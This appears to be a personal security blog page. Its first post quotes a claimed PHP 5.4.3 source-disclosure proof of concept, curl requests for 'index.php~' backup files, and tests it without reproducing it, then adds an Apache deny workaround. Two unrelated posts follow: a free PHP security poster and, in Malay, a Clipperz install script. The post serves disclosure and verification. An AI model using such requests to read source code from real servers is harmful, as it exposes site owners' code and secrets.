Posted: June 15th, 2012 | Author: xanda | Filed under: IT Related | Tags: 5.4.3, Code Read Vulnerability, php | 2 Comments »
As posted on http://1337day.com/exploits/18605, cheki claimed that PHP 5.4.3 is vulnerable to code read vulnerability, where the PHP interpreter will fail to execute the file once ‘~’ symbol added to the end of the file name. Snipped from the PoC:
=============================================================
#Demo: [root@cheki]# curl 109.234.119.2/index.php~
result: <!--?php phpinfo(); ?-->
#Target: http://localhost/index.php~
result: <!--?php phpinfo(); ?-->
============================================================
[root@cheki]# curl 109.234.119.2/index.php
result: NULL
#Target: http://localhost/index.php
result: NULL
=========================================================== |
=============================================================
#Demo: [root@cheki]# curl 109.234.119.2/index.php~
result: <!--?php phpinfo(); ?-->
#Target: http://localhost/index.php~
result: <!--?php phpinfo(); ?-->
============================================================
[root@cheki]# curl 109.234.119.2/index.php
result: NULL
#Target: http://localhost/index.php
result: NULL
===========================================================
Ok.. Since I had a test machine (Ubuntu) SSHed earlier, so I stright away add a new PPA repo (https://launchpad.net/~ondrej/+archive/php5) and install PHP 5.4.3. So here is my version to verify the PoC:
xanda@vostro:~$ php -v
PHP 5.4.3-4~precise+1 (cli) (built: May 17 2012 13:00:25)
Copyright (c) 1997-2012 The PHP Group
Zend Engine v2.4.0, Copyright (c) 1998-2012 Zend Technologies
xanda@vostro:~$ curl 127.0.0.1/index.php
<form action="" method="post">
<input type="text" name="lala">
<input type="submit">
</form>
xanda@vostro:~$ curl 127.0.0.1/index.php~
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /index.php~ was not found on this server.</p>
<hr>
<address>Apache/2.2.22 (Ubuntu) Server at 127.0.0.1 Port 80</address>
</body></html> |
xanda@vostro:~$ php -v
PHP 5.4.3-4~precise+1 (cli) (built: May 17 2012 13:00:25)
Copyright (c) 1997-2012 The PHP Group
Zend Engine v2.4.0, Copyright (c) 1998-2012 Zend Technologies
xanda@vostro:~$ curl 127.0.0.1/index.php
<form action="" method="post">
<input type="text" name="lala">
<input type="submit">
</form>
xanda@vostro:~$ curl 127.0.0.1/index.php~
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /index.php~ was not found on this server.</p>
<hr>
<address>Apache/2.2.22 (Ubuntu) Server at 127.0.0.1 Port 80</address>
</body></html>
Hurmmmm okkkk…. I haven’t tested on Fedora release 17 (Beefy Miracle) as claimed by the author, but I think this is… You name it..
Please take note that most of GUI based text editor (eg: Gedit) will (auto)save your edited file into a backup file with the same file name but ended with ‘~’… Just like in the PoC huh?
If anyone managed to test it on Fedora release 17 (Beefy Miracle), kindly drop me the result on the comment section. Thanks in advance
Cheers 🙂
Mirror for the advisory: http://pastebin.com/H1tjRDpD
Update
1) @Netasq has given 2 workarounds for this issue.
- http://twitter.com/Netasq/status/213647398025703425
In case you can't update PHP to 5.4.4, a quick Apache fix #security (1/2) Order allow,deny Deny from all |
In case you can't update PHP to 5.4.4, a quick Apache fix #security (1/2) Order allow,deny Deny from all
2) Its not listed here (or I’ve missed it?) :- http://www.php.net/ChangeLog-5.php
Posted: November 29th, 2009 | Author: xanda | Filed under: IT Related | Tags: php, poster, security | 1 Comment »
SektionEins has finished the english translation of the PHP Security Poster and sends it now to interested PHP programmers for free. You only have to fill out the order form. The poster is of DIN A0 size and details the most important aspects of configuring PHP securely and writing secure PHP code..
The poster contains the following topics:
- Vulnerabilities & Concepts
- Security Related PHP Funktionen
- Secure Programming
- Hardening the PHP Configuration
- Server Protection with Suhosin
The order form for the poster is available here.
Posted: March 28th, 2008 | Author: xanda | Filed under: IT Related, My Self, Project | Tags: clipperz, php, Project | 2 Comments »
Sedang aku mecari-cari nama untuk projek web based password manager yang aku post dengan title “Another Open Source Project” tu.. Aku telah dijemput oleh founder sebuah projek untuk menyertai 1 projek yang kini sudahpun separuh jalan disiapkan. Projek tu pun merupakan sebuah projek web based password manager jugak tapi yang nie jauh lagi gempak dari apa yang aku plan nak buat la. Projek yang dimaksudkan ialah Clipperz.
[image source: clipperz.com]
Gempak gile aaa… Siap pakai zero-knowledge protocol lagi..
Setelah aku mendownload source code yang diberi, aku pun try la install kat hosting aku dan aku dapati yang installation script dia tak macam web application yang maju-maju sekarang nie la, jadinye… aku pun tulis la 1 installation script pakai PHP untuk meletakkan taraf clipperz setaraf dengan web application lain.
Script tu dah pun siap dan dah pun di-test. So aku submit la code tu kat submission page untuk projek tu. Jadinye sekarang… nantikan la kemunculan installation script clipperz yang baru… hahahah…
Dikesempatan ini, aku jugak nak ucapkan ribuan terima kasih kepada semua yang sudi menyumbang idea untuk nama kepada projek aku yang tak jadi nak buat tu…
Thanks..